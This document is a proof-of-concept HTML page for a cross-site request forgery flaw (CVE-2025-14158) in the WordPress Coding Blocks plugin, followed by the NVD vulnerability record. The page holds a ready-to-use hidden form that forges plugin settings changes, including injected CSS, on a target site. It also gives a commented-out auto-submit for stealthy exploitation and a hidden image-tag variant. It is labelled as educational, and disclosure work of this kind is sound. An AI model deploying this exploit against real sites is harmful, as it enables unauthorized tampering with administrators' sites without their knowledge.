CVE-2025-14158

<!-- CSRF PoC for CVE-2025-14158 --> <!-- This PoC demonstrates the CSRF vulnerability in WordPress Coding Blocks plugin <= 1.1.0 --> <!-- Attacker can trick admin to update plugin settings without nonce validation --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-14158</title> </head> <body> <h1>CVE-2025-14158 CSRF PoC</h1> <p>Click the button below to trigger the CSRF attack (settings update)</p> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="csrfForm"> <!-- Plugin settings update action --> <input type="hidden" name="action" value="coding_blocks_save_settings"> <!-- Malicious settings parameters --> <input type="hidden" name="cb_theme" value="malicious_theme"> <input type="hidden" name="cb_custom_css" value="/* injected malicious CSS */"> <!-- Additional settings that can be modified --> <input type="hidden" name="cb_options[highlight_theme]" value="attack"> <input type="hidden" name="cb_options[line_numbers]" value="1"> </form> <button type="button" onclick="document.getElementById('csrfForm').submit();">Click Me</button> <script> // Auto-submit form after page load (for more stealthy attack) // Uncomment the line below for automatic exploitation // window.onload = function() { document.getElementById('csrfForm').submit(); }; </script> <p><strong>Note:</strong> This PoC is for educational and security testing purposes only.</p> </body> </html> <!-- Alternative: Image tag based CSRF (no user interaction required visually) --> <!-- <img src="http://target-site/wp-admin/admin-post.php?action=coding_blocks_save_settings&cb_theme=malicious" width="0" height="0" border="0" style="display:none"> -->

{"cve": {"id": "CVE-2025-14158", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:48.380", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Coding Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update plugin settings including the theme configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/coding-blocks/tags/1.1.0/admin/pages/settings.php#L11", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/coding-blocks/trunk/admin/pages/settings.php#L11", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/coding-blocks/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a4833de-d530-4bbf-ac28-e5d4b5f68f1e?source=cve", "source": "[email protected]"}]}}